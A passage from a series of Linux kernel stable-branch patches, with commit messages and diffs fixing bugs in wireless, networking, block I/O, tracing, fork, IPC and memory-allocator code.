ret; + + lockdep_assert_held(&rdev->bss_lock); + + list_for_each_entry(bss, &rdev->bss_list, list) { + if (atomic_read(&bss->hold)) + continue; + + if (!list_empty(&bss->hidden_list) && + !bss->pub.hidden_beacon_bss) + continue; + + if (oldest && time_before(oldest->ts, bss->ts)) + continue; + oldest = bss; + } + + if (WARN_ON(!oldest)) + return false; + + /* + * The callers make sure to increase rdev->bss_generation if anything + * gets removed (and a new entry added), so there's no need to also do + * it here. + */ + + ret = __cfg80211_unlink_bss(rdev, oldest); + WARN_ON(!ret); + return ret; +} + const u8 *cfg80211_find_ie(u8 eid, const u8 *ies, int len) { while (len > 2 && ies[0] != eid) { @@ -622,6 +673,7 @@ static bool cfg80211_combine_bsses(struct cfg80211_registered_device *dev, const u8 *ie; int i, ssidlen; u8 fold = 0; + u32 n_entries = 0; ies = rcu_access_pointer(new->pub.beacon_ies); if (WARN_ON(!ies)) @@ -645,6 +697,12 @@ static bool cfg80211_combine_bsses(struct cfg80211_registered_device *dev, /* This is the bad part ... */ list_for_each_entry(bss, &dev->bss_list, list) { + /* + * we're iterating all the entries anyway, so take the + * opportunity to validate the list length accounting + */ + n_entries++; + if (!ether_addr_equal(bss->pub.bssid, new->pub.bssid)) continue; if (bss->pub.channel != new->pub.channel) @@ -674,6 +732,10 @@ static bool cfg80211_combine_bsses(struct cfg80211_registered_device *dev, new->pub.beacon_ies); } + WARN_ONCE(n_entries != dev->bss_entries, + "rdev bss entries[%d]/list[len:%d] corruption\n", + dev->bss_entries, n_entries); + return true; } @@ -818,7 +880,14 @@ cfg80211_bss_update(struct cfg80211_registered_device *dev, } } + if (dev->bss_entries >= bss_entries_limit && + !cfg80211_bss_expire_oldest(dev)) { + kfree(new); + goto drop; + } + list_add_tail(&new->list, &dev->bss_list); + dev->bss_entries++; rb_insert_bss(dev, new); found = new; } From 3cc6c6bde2cad57013865fd7e282c0c37a7207ae Mon Sep 17 00:00:00 2001 From: Brian Norris Date: Tue, 8 Nov 2016 18:28:24 -0800 Subject: [PATCH 271/315] mwifiex: printk() overflow with 32-byte SSIDs commit fcd2042e8d36cf644bd2d69c26378d17158b17df upstream. SSIDs aren't guaranteed to be 0-terminated. Let's cap the max length when we print them out. This can be easily noticed by connecting to a network with a 32-octet SSID: [ 3903.502925] mwifiex_pcie 0000:01:00.0: info: trying to associate to '0123456789abcdef0123456789abcdef ' bssid xx:xx:xx:xx:xx:xx Fixes: 5e6e3a92b9a4 ("wireless: mwifiex: initial commit for Marvell mwifiex driver") Signed-off-by: Brian Norris Acked-by: Amitkumar Karwar Signed-off-by: Kalle Valo Signed-off-by: Willy Tarreau --- drivers/net/wireless/mwifiex/cfg80211.c | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/drivers/net/wireless/mwifiex/cfg80211.c b/drivers/net/wireless/mwifiex/cfg80211.c index e7f7cdfafd5..fa0e45b82ce 100644 --- a/drivers/net/wireless/mwifiex/cfg80211.c +++ b/drivers/net/wireless/mwifiex/cfg80211.c @@ -1633,8 +1633,9 @@ done: is_scanning_required = 1; } else { dev_dbg(priv->adapter->dev, - "info: trying to associate to '%s' bssid %pM\n", - (char *) req_ssid.ssid, bss->bssid); + "info: trying to associate to '%.*s' bssid %pM\n", + req_ssid.ssid_len, (char *)req_ssid.ssid, + bss->bssid); memcpy(&priv->cfg_bssid, bss->bssid, ETH_ALEN); break; } @@ -1675,8 +1676,8 @@ mwifiex_cfg80211_connect(struct wiphy *wiphy, struct net_device *dev, return -EINVAL; } - wiphy_dbg(wiphy, "info: Trying to associate to %s and bssid %pM\n", - (char *) sme->ssid, sme->bssid); + wiphy_dbg(wiphy, "info: Trying to associate to %.*s and bssid %pM\n", + (int)sme->ssid_len, (char *)sme->ssid, sme->bssid); ret = mwifiex_cfg80211_assoc(priv, sme->ssid_len, sme->ssid, sme->bssid, priv->bss_mode, sme->channel, sme, 0); @@ -1799,8 +1800,8 @@ mwifiex_cfg80211_join_ibss(struct wiphy *wiphy, struct net_device *dev, goto done; } - wiphy_dbg(wiphy, "info: trying to join to %s and bssid %pM\n", - (char *) params->ssid, params->bssid); + wiphy_dbg(wiphy, "info: trying to join to %.*s and bssid %pM\n", + params->ssid_len, (char *)params->ssid, params->bssid); mwifiex_set_ibss_params(priv, params); From 85801b799e121eefd31eb8a6bc2eb4064220e687 Mon Sep 17 00:00:00 2001 From: Eli Cooper Date: Thu, 1 Dec 2016 10:05:10 +0800 Subject: [PATCH 272/315] ipv4: Set skb->protocol properly for local output commit f4180439109aa720774baafdd798b3234ab1a0d2 upstream. When xfrm is applied to TSO/GSO packets, it follows this path: xfrm_output() -> xfrm_output_gso() -> skb_gso_segment() where skb_gso_segment() relies on skb->protocol to function properly. This patch sets skb->protocol to ETH_P_IP before dst_output() is called, fixing a bug where GSO packets sent through a sit tunnel are dropped when xfrm is involved. Signed-off-by: Eli Cooper Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/ipv4/ip_output.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c index 57e74508630..5f077efad29 100644 --- a/net/ipv4/ip_output.c +++ b/net/ipv4/ip_output.c @@ -97,6 +97,9 @@ int __ip_local_out(struct sk_buff *skb) iph->tot_len = htons(skb->len); ip_send_check(iph); + + skb->protocol = htons(ETH_P_IP); + return nf_hook(NFPROTO_IPV4, NF_INET_LOCAL_OUT, skb, NULL, skb_dst(skb)->dev, dst_output); } From c9dade91140f892d059f66bd9d8c4c566366ea3f Mon Sep 17 00:00:00 2001 From: Jeremy Linton Date: Thu, 17 Nov 2016 09:14:25 -0600 Subject: [PATCH 273/315] net: sky2: Fix shutdown crash commit 06ba3b2133dc203e1e9bc36cee7f0839b79a9e8b upstream. The sky2 frequently crashes during machine shutdown with: sky2_get_stats+0x60/0x3d8 [sky2] dev_get_stats+0x68/0xd8 rtnl_fill_stats+0x54/0x140 rtnl_fill_ifinfo+0x46c/0xc68 rtmsg_ifinfo_build_skb+0x7c/0xf0 rtmsg_ifinfo.part.22+0x3c/0x70 rtmsg_ifinfo+0x50/0x5c netdev_state_change+0x4c/0x58 linkwatch_do_dev+0x50/0x88 __linkwatch_run_queue+0x104/0x1a4 linkwatch_event+0x30/0x3c process_one_work+0x140/0x3e0 worker_thread+0x60/0x44c kthread+0xdc/0xf0 ret_from_fork+0x10/0x50 This is caused by the sky2 being called after it has been shutdown. A previous thread about this can be found here: https://lkml.org/lkml/2016/4/12/410 An alternative fix is to assure that IFF_UP gets cleared by calling dev_close() during shutdown. This is similar to what the bnx2/tg3/xgene and maybe others are doing to assure that the driver isn't being called following _shutdown(). Signed-off-by: Jeremy Linton Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- drivers/net/ethernet/marvell/sky2.c | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/drivers/net/ethernet/marvell/sky2.c b/drivers/net/ethernet/marvell/sky2.c index d175bbd3ffd..4ac9dfd3f12 100644 --- a/drivers/net/ethernet/marvell/sky2.c +++ b/drivers/net/ethernet/marvell/sky2.c @@ -5197,6 +5197,19 @@ static SIMPLE_DEV_PM_OPS(sky2_pm_ops, sky2_suspend, sky2_resume); static void sky2_shutdown(struct pci_dev *pdev) { + struct sky2_hw *hw = pci_get_drvdata(pdev); + int port; + + for (port = 0; port < hw->ports; port++) { + struct net_device *ndev = hw->dev[port]; + + rtnl_lock(); + if (netif_running(ndev)) { + dev_close(ndev); + netif_device_detach(ndev); + } + rtnl_unlock(); + } sky2_suspend(&pdev->dev); pci_wake_from_d3(pdev, device_may_wakeup(&pdev->dev)); pci_set_power_state(pdev, PCI_D3hot); From a1f5e915d0fad05c54bcf087a9b8a85560e0f846 Mon Sep 17 00:00:00 2001 From: Oliver Neukum Date: Wed, 17 Aug 2016 15:51:55 +0200 Subject: [PATCH 274/315] kaweth: fix firmware download commit 60bcabd080f53561efa9288be45c128feda1a8bb upstream. This fixes the oops discovered by the Umap2 project and Alan Stern. The intf member needs to be set before the firmware is downloaded. Signed-off-by: Oliver Neukum Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- drivers/net/usb/kaweth.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/drivers/net/usb/kaweth.c b/drivers/net/usb/kaweth.c index afb117c16d2..8ba774de347 100644 --- a/drivers/net/usb/kaweth.c +++ b/drivers/net/usb/kaweth.c @@ -1031,6 +1031,7 @@ static int kaweth_probe( kaweth = netdev_priv(netdev); kaweth->dev = udev; kaweth->net = netdev; + kaweth->intf = intf; spin_lock_init(&kaweth->device_lock); init_waitqueue_head(&kaweth->term_wait); @@ -1141,8 +1142,6 @@ err_fw: dev_dbg(dev, "Initializing net device.\n"); - kaweth->intf = intf; - kaweth->tx_urb = usb_alloc_urb(0, GFP_KERNEL); if (!kaweth->tx_urb) goto err_free_netdev; From 0d75118c756e5c47dbb5394e3ad1d896d6f80285 Mon Sep 17 00:00:00 2001 From: "Steven Rostedt (Red Hat)" Date: Fri, 23 Sep 2016 22:57:13 -0400 Subject: [PATCH 275/315] tracing: Move mutex to protect against resetting of seq data commit 1245800c0f96eb6ebb368593e251d66c01e61022 upstream. The iter->seq can be reset outside the protection of the mutex. So can reading of user data. Move the mutex up to the beginning of the function. Fixes: d7350c3f45694 ("tracing/core: make the read callbacks reentrants") Reported-by: Al Viro Signed-off-by: Steven Rostedt Signed-off-by: Willy Tarreau --- kernel/trace/trace.c | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c index 4ff36f73f1a..d6e72522fc4 100644 --- a/kernel/trace/trace.c +++ b/kernel/trace/trace.c @@ -4121,13 +4121,6 @@ tracing_read_pipe(struct file *filp, char __user *ubuf, struct trace_array *tr = iter->tr; ssize_t sret; - /* return any leftover data */ - sret = trace_seq_to_user(&iter->seq, ubuf, cnt); - if (sret != -EBUSY) - return sret; - - trace_seq_init(&iter->seq); - /* copy the tracer to avoid using a global lock all around */ mutex_lock(&trace_types_lock); if (unlikely(iter->trace->name != tr->current_trace->name)) @@ -4140,6 +4133,14 @@ tracing_read_pipe(struct file *filp, char __user *ubuf, * is protected. */ mutex_lock(&iter->mutex); + + /* return any leftover data */ + sret = trace_seq_to_user(&iter->seq, ubuf, cnt); + if (sret != -EBUSY) + goto out; + + trace_seq_init(&iter->seq); + if (iter->trace->read) { sret = iter->trace->read(iter, filp, ubuf, cnt, ppos); if (sret) From 9c559b0f16355aaf8de2aac991be2dd90c13792b Mon Sep 17 00:00:00 2001 From: Michal Hocko Date: Thu, 1 Sep 2016 16:15:13 -0700 Subject: [PATCH 276/315] kernel/fork: fix CLONE_CHILD_CLEARTID regression in nscd commit 735f2770a770156100f534646158cb58cb8b2939 upstream. Commit fec1d0115240 ("[PATCH] Disable CLONE_CHILD_CLEARTID for abnormal exit") has caused a subtle regression in nscd which uses CLONE_CHILD_CLEARTID to clear the nscd_certainly_running flag in the shared databases, so that the clients are notified when nscd is restarted. Now, when nscd uses a non-persistent database, clients that have it mapped keep thinking the database is being updated by nscd, when in fact nscd has created a new (anonymous) one (for non-persistent databases it uses an unlinked file as backend). The original proposal for the CLONE_CHILD_CLEARTID change claimed (https://lkml.org/lkml/2006/10/25/233): : The NPTL library uses the CLONE_CHILD_CLEARTID flag on clone() syscalls : on behalf of pthread_create() library calls. This feature is used to : request that the kernel clear the thread-id in user space (at an address : provided in the syscall) when the thread disassociates itself from the : address space, which is done in mm_release(). : : Unfortunately, when a multi-threaded process incurs a core dump (such as : from a SIGSEGV), the core-dumping thread sends SIGKILL signals to all of : the other threads, which then proceed to clear their user-space tids : before synchronizing in exit_mm() with the start of core dumping. This : misrepresents the state of process's address space at the time of the : SIGSEGV and makes it more difficult for someone to debug NPTL and glibc : problems (misleading him/her to conclude that the threads had gone away : before the fault). : : The fix below is to simply avoid the CLONE_CHILD_CLEARTID action if a : core dump has been initiated. The resulting patch from Roland (https://lkml.org/lkml/2006/10/26/269) seems to have a larger scope than the original patch asked for. It seems that limitting the scope of the check to core dumping should work for SIGSEGV issue describe above. [Changelog partly based on Andreas' description] Fixes: fec1d0115240 ("[PATCH] Disable CLONE_CHILD_CLEARTID for abnormal exit") Link: http://lkml.kernel.org/r/1471968749-26173-1-git-send-email-mhocko@kernel.org Signed-off-by: Michal Hocko Tested-by: William Preston Acked-by: Oleg Nesterov Cc: Roland McGrath Cc: Andreas Schwab Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds Signed-off-by: Willy Tarreau --- kernel/fork.c | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/kernel/fork.c b/kernel/fork.c index 2358bd4c875..612e78d8219 100644 --- a/kernel/fork.c +++ b/kernel/fork.c @@ -775,14 +775,12 @@ void mm_release(struct task_struct *tsk, struct mm_struct *mm) deactivate_mm(tsk, mm); /* - * If we're exiting normally, clear a user-space tid field if - * requested. We leave this alone when dying by signal, to leave - * the value intact in a core dump, and to save the unnecessary - * trouble, say, a killed vfork parent shouldn't touch this mm. - * Userland only wants this done for a sys_exit. + * Signal userspace if we're not exiting with a core dump + * because we want to leave the value intact for debugging + * purposes. */ if (tsk->clear_child_tid) { - if (!(tsk->flags & PF_SIGNALED) && + if (!(tsk->signal->flags & SIGNAL_GROUP_COREDUMP) && atomic_read(&mm->mm_users) > 1) { /* * We don't check the error code - if userspace has From 3d971ee18fe6ca21b722ce2c7e7a1d834d60929b Mon Sep 17 00:00:00 2001 From: Willy Tarreau Date: Mon, 6 Feb 2017 08:59:06 +0100 Subject: [PATCH 277/315] Revert "ipc/sem.c: optimize sem_lock()" This reverts commit 901f6fedc5340d66e2ca67c70dfee926cb5a1ea0 (upstream commit 6d07b68ce16ae9535955ba2059dedba5309c3ca1). As suggested in commit 5864a2fd3088db73d47942370d0f7210a807b9bc (ipc/sem.c: fix complex_count vs. simple op race) since it introduces a regression and the candidate fix requires too many changes for 3.10. Cc: Manfred Spraul Signed-off-by: Willy Tarreau --- ipc/sem.c | 8 -------- 1 file changed, 8 deletions(-) diff --git a/ipc/sem.c b/ipc/sem.c index 47a15192b8b..3b968a028cc 100644 --- a/ipc/sem.c +++ b/ipc/sem.c @@ -267,20 +267,12 @@ static void sem_rcu_free(struct rcu_head *head) * Caller must own sem_perm.lock. * New simple ops cannot start, because simple ops first check * that sem_perm.lock is free. - * that a) sem_perm.lock is free and b) complex_count is 0. */ static void sem_wait_array(struct sem_array *sma) { int i; struct sem *sem; - if (sma->complex_count) { - /* The thread that increased sma->complex_count waited on - * all sem->lock locks. Thus we don't need to wait again. - */ - return; - } - for (i = 0; i < sma->sem_nsems; i++) { sem = sma->sem_base + i; spin_unlock_wait(&sem->lock); From 5dd23e675ad85931045252de3d2688e88435b287 Mon Sep 17 00:00:00 2001 From: Glauber Costa Date: Thu, 22 Sep 2016 20:59:59 -0400 Subject: [PATCH 278/315] cfq: fix starvation of asynchronous writes commit 3932a86b4b9d1f0b049d64d4591ce58ad18b44ec upstream. While debugging timeouts happening in my application workload (ScyllaDB), I have observed calls to open() taking a long time, ranging everywhere from 2 seconds - the first ones that are enough to time out my application - to more than 30 seconds. The problem seems to happen because XFS may block on pending metadata updates under certain circumnstances, and that's confirmed with the following backtrace taken by the offcputime tool (iovisor/bcc): ffffffffb90c57b1 finish_task_switch ffffffffb97dffb5 schedule ffffffffb97e310c schedule_timeout ffffffffb97e1f12 __down ffffffffb90ea821 down ffffffffc046a9dc xfs_buf_lock ffffffffc046abfb _xfs_buf_find ffffffffc046ae4a xfs_buf_get_map ffffffffc046babd xfs_buf_read_map ffffffffc0499931 xfs_trans_read_buf_map ffffffffc044a561 xfs_da_read_buf ffffffffc0451390 xfs_dir3_leaf_read.constprop.16 ffffffffc0452b90 xfs_dir2_leaf_lookup_int ffffffffc0452e0f xfs_dir2_leaf_lookup ffffffffc044d9d3 xfs_dir_lookup ffffffffc047d1d9 xfs_lookup ffffffffc0479e53 xfs_vn_lookup ffffffffb925347a path_openat ffffffffb9254a71 do_filp_open ffffffffb9242a94 do_sys_open ffffffffb9242b9e sys_open ffffffffb97e42b2 entry_SYSCALL_64_fastpath 00007fb0698162ed [unknown] Inspecting my run with blktrace, I can see that the xfsaild kthread exhibit very high "Dispatch wait" times, on the dozens of seconds range and consistent with the open() times I have saw in that run. Still from the blktrace output, we can after searching a bit, identify the request that wasn't dispatched: 8,0 11 152 81.092472813 804 A WM 141698288 + 8 <- (8,1) 141696240 8,0 11 153 81.092472889 804 Q WM 141698288 + 8 [xfsaild/sda1] 8,0 11 154 81.092473207 804 G WM 141698288 + 8 [xfsaild/sda1] 8,0 11 206 81.092496118 804 I WM 141698288 + 8 ( 22911) [xfsaild/sda1] <==== 'I' means Inserted (into the IO scheduler) ===================================> 8,0 0 289372 96.718761435 0 D WM 141698288 + 8 (15626265317) [swapper/0] <==== Only 15s later the CFQ scheduler dispatches the request ======================> As we can see above, in this particular example CFQ took 15 seconds to dispatch this request. Going back to the full trace, we can see that the xfsaild queue had plenty of opportunity to run, and it was selected as the active queue many times. It would just always be preempted by something else (example): 8,0 1 0 81.117912979 0 m N cfq1618SN / insert_request 8,0 1 0 81.117913419 0 m N cfq1618SN / add_to_rr 8,0 1 0 81.117914044 0 m N cfq1618SN / preempt 8,0 1 0 81.117914398 0 m N cfq767A / slice expired t=1 8,0 1 0 81.117914755 0 m N cfq767A / resid=40 8,0 1 0 81.117915340 0 m N / served: vt=1948520448 min_vt=1948520448 8,0 1 0 81.117915858 0 m N cfq767A / sl_used=1 disp=0 charge=0 iops=1 sect=0 where cfq767 is the xfsaild queue and cfq1618 corresponds to one of the ScyllaDB IO dispatchers. The requests preempting the xfsaild queue are synchronous requests. That's a characteristic of ScyllaDB workloads, as we only ever issue O_DIRECT requests. While it can be argued that preempting ASYNC requests in favor of SYNC is part of the CFQ logic, I don't believe that doing so for 15+ seconds is anyone's goal. Moreover, unless I am misunderstanding something, that breaks the expectation set by the "fifo_expire_async" tunable, which in my system is set to the default. Looking at the code, it seems to me that the issue is that after we make an async queue active, there is no guarantee that it will execute any request. When the queue itself tests if it cfq_may_dispatch() it can bail if it sees SYNC requests in flight. An incoming request from another queue can also preempt it in such situation before we have the chance to execute anything (as seen in the trace above). This patch sets the must_dispatch flag if we notice that we have requests that are already fifo_expired. This flag is always cleared after cfq_dispatch_request() returns from cfq_dispatch_requests(), so it won't pin the queue for subsequent requests (unless they are themselves expired) Care is taken during preempt to still allow rt requests to preempt us regardless. Testing my workload with this patch applied produces much better results. From the application side I see no timeouts, and the open() latency histogram generated by systemtap looks much better, with the worst outlier at 131ms: Latency histogram of xfs_buf_lock acquisition (microseconds): value |-------------------------------------------------- count 0 | 11 1 |@@@@ 161 2 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 1966 4 |@ 54 8 | 36 16 | 7 32 | 0 64 | 0 ~ 1024 | 0 2048 | 0 4096 | 1 8192 | 1 16384 | 2 32768 | 0 65536 | 0 131072 | 1 262144 | 0 524288 | 0 Signed-off-by: Glauber Costa CC: Jens Axboe CC: linux-block@vger.kernel.org CC: linux-kernel@vger.kernel.org Signed-off-by: Glauber Costa Signed-off-by: Jens Axboe Signed-off-by: Willy Tarreau --- block/cfq-iosched.c | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/block/cfq-iosched.c b/block/cfq-iosched.c index 69111c5c352..ddb0ebb89f4 100644 --- a/block/cfq-iosched.c +++ b/block/cfq-iosched.c @@ -2812,7 +2812,6 @@ static struct request *cfq_check_fifo(struct cfq_queue *cfqq) if (time_before(jiffies, rq_fifo_time(rq))) rq = NULL; - cfq_log_cfqq(cfqq->cfqd, cfqq, "fifo=%p", rq); return rq; } @@ -3186,6 +3185,9 @@ static bool cfq_may_dispatch(struct cfq_data *cfqd, struct cfq_queue *cfqq) { unsigned int max_dispatch; + if (cfq_cfqq_must_dispatch(cfqq)) + return true; + /* * Drain async requests before we start sync IO */ @@ -3277,15 +3279,20 @@ static bool cfq_dispatch_request(struct cfq_data *cfqd, struct cfq_queue *cfqq) BUG_ON(RB_EMPTY_ROOT(&cfqq->sort_list)); + rq = cfq_check_fifo(cfqq); + if (rq) + cfq_mark_cfqq_must_dispatch(cfqq); + if (!cfq_may_dispatch(cfqd, cfqq)) return false; /* * follow expired path, else get first next available */ - rq = cfq_check_fifo(cfqq); if (!rq) rq = cfqq->next_rq; + else + cfq_log_cfqq(cfqq->cfqd, cfqq, "fifo=%p", rq); /* * insert request into driver dispatch list @@ -3794,7 +3801,7 @@ cfq_should_preempt(struct cfq_data *cfqd, struct cfq_queue *new_cfqq, * if the new request is sync, but the currently running queue is * not, let the sync request have priority. */ - if (rq_is_sync(rq) && !cfq_cfqq_sync(cfqq)) + if (rq_is_sync(rq) && !cfq_cfqq_sync(cfqq) && !cfq_cfqq_must_dispatch(cfqq)) return true; if (new_cfqq->cfqg != cfqq->cfqg) From 7a59aff691251369427fe72aca5925b8db52937e Mon Sep 17 00:00:00 2001 From: Richard Weinberger Date: Wed, 9 Nov 2016 22:52:58 +0100 Subject: [PATCH 279/315] drbd: Fix kernel_sendmsg() usage - potential NULL deref commit d8e9e5e80e882b4f90cba7edf1e6cb7376e52e54 upstream. Don't pass a size larger than iov_len to kernel_sendmsg(). Otherwise it will cause a NULL pointer deref when kernel_sendmsg() returns with rv < size. DRBD as external module has been around in the kernel 2.4 days already. We used to be compatible to 2.4 and very early 2.6 kernels, we used to use rv = sock_sendmsg(sock, &msg, iov.iov_len); then later changed to rv = kernel_sendmsg(sock, &msg, &iov, 1, size); when we should have used rv = kernel_sendmsg(sock, &msg, &iov, 1, iov.iov_len); tcp_sendmsg() used to totally ignore the size parameter. 57be5bd ip: convert tcp_sendmsg() to iov_iter primitives changes that, and exposes our long standing error. Even with this error exposed, to trigger the bug, we would need to have an environment (config or otherwise) causing us to not use sendpage() for larger transfers, a failing connection, and have it fail "just at the right time". Apparently that was unlikely enough for most, so this went unnoticed for years. Still, it is known to trigger at least some of these, and suspected for the others: [0] http://lists.linbit.com/pipermail/drbd-user/2016-July/023112.html [1] http://lists.linbit.com/pipermail/drbd-dev/2016-March/003362.html [2] https://forums.grsecurity.net/viewtopic.php?f=3&t=4546 [3] https://ubuntuforums.org/showthread.php?t=2336150 [4] http://e2.howsolveproblem.com/i/1175162/ This should go into 4.9, and into all stable branches since and including v4.0, which is the first to contain the exposing change. It is correct for all stable branches older than that as well (which contain the DRBD driver; which is 2.6.33 and up). It requires a small "conflict" resolution for v4.4 and earlier, with v4.5 we dropped the comment block immediately preceding the kernel_sendmsg(). Fixes: b411b3637fa7 ("The DRBD driver") Cc: viro@zeniv.linux.org.uk Cc: christoph.lechleitner@iteg.at Cc: wolfgang.glas@iteg.at Reported-by: Christoph Lechleitner Tested-by: Christoph Lechleitner Signed-off-by: Richard Weinberger [changed oneliner to be "obvious" without context; more verbose message] Signed-off-by: Lars Ellenberg Signed-off-by: Jens Axboe Signed-off-by: Willy Tarreau --- drivers/block/drbd/drbd_main.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/block/drbd/drbd_main.c b/drivers/block/drbd/drbd_main.c index a5dca6affcb..776fc08aff0 100644 --- a/drivers/block/drbd/drbd_main.c +++ b/drivers/block/drbd/drbd_main.c @@ -1771,7 +1771,7 @@ int drbd_send(struct drbd_tconn *tconn, struct socket *sock, * do we need to block DRBD_SIG if sock == &meta.socket ?? * otherwise wake_asender() might interrupt some send_*Ack ! */ - rv = kernel_sendmsg(sock, &msg, &iov, 1, size); + rv = kernel_sendmsg(sock, &msg, &iov, 1, iov.iov_len); if (rv == -EAGAIN) { if (we_should_drop_the_connection(tconn, sock)) break; From f98c2c402949fe2834a8291662c92c4ab5122273 Mon Sep 17 00:00:00 2001 From: Daniel Mentz Date: Thu, 27 Oct 2016 17:46:59 -0700 Subject: [PATCH 280/315] lib/genalloc.c: start search from start of chunk commit 62e931fac45b17c2a42549389879411572f75804 upstream. gen_pool_alloc_algo() iterates over the chunks of a pool trying to find a contiguous block of memory that satisfies the allocation request. The shortcut if (size > atomic_read(&chunk->avail)) continue; makes the loop skip over chunks that do not have enough bytes left to fulfill the request. There are two situations, though, where an allocation might still fail: (1) The available memory is not contiguous, i.e. the request cannot be fulfilled due to external fragmentation. (2) A race condition. Another thread runs the same code concurrently and is quicker to grab the available memory. In those situations, the loop calls pool->algo() to search the entire chunk, and pool->algo() returns some value that is >= end_bit to indicate that the search failed. This return value is then assigned to start_bit. The variables start_bit and end_bit describe the range that should be searched, and this range should be reset for every chunk that is searched. Today, the code fails to reset start_bit to 0. As a result, prefixes of subsequent chunks are ignored. Memory allocations might fail even though there is plenty of room left in these prefixes of those other chunks. Fixes: 7f184275aa30 ("lib, Make gen_pool memory allocator lockless") Link: http://lkml.kernel.org/r/1477420604-28918-1-git-send-email-danielmentz@google.com Signed-off-by: Daniel Mentz Reviewed-by: Mathieu Desnoyers Acked-by: Will Deacon Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds Signed-off-by: Willy Tarreau --- lib/genalloc.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/genalloc.c b/lib/genalloc.c index 2a39bf62d8c..ac5fba950eb 100644 --- a/lib/genalloc.c +++ b/lib/genalloc.c @@ -273,7 +273,7 @@ unsigned long gen_pool_alloc(struct gen_pool *pool, size_t size) struct gen_pool_chunk *chunk; unsigned long addr = 0; int order = pool->min_alloc_order; - int nbits, start_bit = 0, end_bit, remain; + int nbits, start_bit, end_bit, remain; #ifndef CONFIG_ARCH_HAVE_NMI_SAFE_CMPXCHG BUG_ON(in_nmi()); @@ -288,6 +288,7 @@ unsigned long gen_pool_alloc(struct gen_pool *pool, size_t size) if (size > atomic_read(&chunk->avail)) continue; + start_bit = 0; end_bit = chunk_size(chunk) >> order; retry: start_bit = pool->algo(chunk->bits, end_bit, start_bit, nbits, From 9db8b648012f91d0ed05695ab2fe43c3eac8879a Mon Sep 17 00:00:00 2001 From: Dan Carpenter Date: Wed, 20 Jul 2016 15:45:05 -0700 Subject: [PATCH 281/315] tools/vm/slabinfo: fix an unintentional printf commit 2d6a4d64812bb12dda53704943b61a7496d02098 upstream. The curly braces are missing here so we print stuff unintentionally. Fixes: 9da4714a2d44 ('slub: slabinfo update for cmpxchg handling') Link: http://lkml.kernel.org/r/20160715211243.GE19522@mwanda Signed-off-by: Dan Carpenter Acked-by: Christoph Lameter Cc: Sergey Senozhatsky Cc: Colin Ian King Cc: Laura Abbott Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds Signed-off-by: Willy Tarreau --- tools/vm/slabinfo.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/tools/vm/slabinfo.c b/tools/vm/slabinfo.c index 808d5a9d5dc..bcc6125657e 100644 --- a/tools/vm/slabinfo.c +++ b/tools/vm/slabinfo.c @@ -493,10 +493,11 @@ static void slab_stats(struct slabinfo *s) s->alloc_node_mismatch, (s->alloc_node_mismatch * 100) / total); } - if (s->cmpxchg_double_fail || s->cmpxchg_double_cpu_fail) + if (s->cmpxchg_double_fail || s->cmpxchg_double_cpu_fail) { printf("\nCmpxchg_double Looping\n------------------------\n"); printf("Locked Cmpxchg Double redos %lu\nUnlocked Cmpxchg Double redos %lu\n", s->cmpxchg_double_fail, s->cmpxchg_double_cpu_fail); + } } static void report(struct slabinfo *s) From fe5080ab6312a89b61fdd1341519b88bbfae0eae Mon Sep 17 00:00:00 2001 From: Ding Tianhong Date: Wed, 15 Jun 2016 15:27:36 +0800 Subject: [PATCH 282/315] rcu: Fix soft lockup for rcu_nocb_kthread commit bedc1969150d480c462cdac320fa944b694a7162 upstream. Carrying out the following steps results in a softlockup in the RCU callback-offload (rcuo) kthreads: 1. Connect to ixgbevf, and set the speed to 10Gb/s. 2. Use ifconfig to bring the nic up and down repeatedly. [ 317.005148] IPv6: ADDRCONF(NETDEV_CHANGE): eth2: link becomes ready [ 368.106005] BUG: soft lockup - CPU#1 stuck for 22s! [rcuos/1:15] [ 368.106005] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 [ 368.106005] task: ffff88057dd8a220 ti: ffff88057dd9c000 task.ti: ffff88057dd9c000 [ 368.106005] RIP: 0010:[] [] fib_table_lookup+0x14/0x390 [ 368.106005] RSP: 0018:ffff88061fc83ce8 EFLAGS: 00000286 [ 368.106005] RAX: 0000000000000001 RBX: 00000000020155c0 RCX: 0000000000000001 [ 368.106005] RDX: ffff88061fc83d50 RSI: ffff88061fc83d70 RDI: ffff880036d11a00 [ 368.106005] RBP: ffff88061fc83d08 R08: 0000000000000001 R09: 0000000000000000 [ 368.106005] R10: ffff880036d11a00 R11: ffffffff819e0900 R12: ffff88061fc83c58 [ 368.106005] R13: ffffffff816154dd R14: ffff88061fc83d08 R15: 00000000020155c0 [ 368.106005] FS: 0000000000000000(0000) GS:ffff88061fc80000(0000) knlGS:0000000000000000 [ 368.106005] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 368.106005] CR2: 00007f8c2aee9c40 CR3: 000000057b222000 CR4: 00000000000407e0 [ 368.106005] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 368.106005] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 368.106005] Stack: [ 368.106005] 00000000010000c0 ffff88057b766000 ffff8802e380b000 ffff88057af03e00 [ 368.106005] ffff88061fc83dc0 ffffffff815349a6 ffff88061fc83d40 ffffffff814ee146 [ 368.106005] ffff8802e380af00 00000000e380af00 ffffffff819e0900 020155c0010000c0 [ 368.106005] Call Trace: 